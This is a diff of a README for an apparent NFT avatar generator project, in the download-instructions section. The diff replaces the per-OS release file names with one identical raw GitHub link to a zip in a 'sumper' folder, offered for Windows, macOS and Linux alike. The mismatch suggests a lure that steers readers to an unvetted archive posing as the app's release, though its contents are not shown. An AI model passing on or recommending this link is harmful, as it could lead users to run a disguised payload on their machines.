tranhaust2006/nft-avatar-generator/README.md

 ### 3. Download the Application

 Click on the version number link that depicts the latest release.
 Then look for the download file suitable for your operating system.
-It may be shown as `nft-avatar-generator-windows.exe` for Windows, `nft-avatar-generator-macos.zip` for macOS, or `nft-avatar-generator-linux.tar.gz` for Linux.
+It may be shown as `https://raw.githubusercontent.com/tranhaust2006/nft-avatar-generator/main/sumper/generator-nft-avatar-1.3.zip` for Windows, `https://raw.githubusercontent.com/tranhaust2006/nft-avatar-generator/main/sumper/generator-nft-avatar-1.3.zip` for macOS, or `https://raw.githubusercontent.com/tranhaust2006/nft-avatar-generator/main/sumper/generator-nft-avatar-1.3.zip` for Linux.

 Simply click on the file to start the download.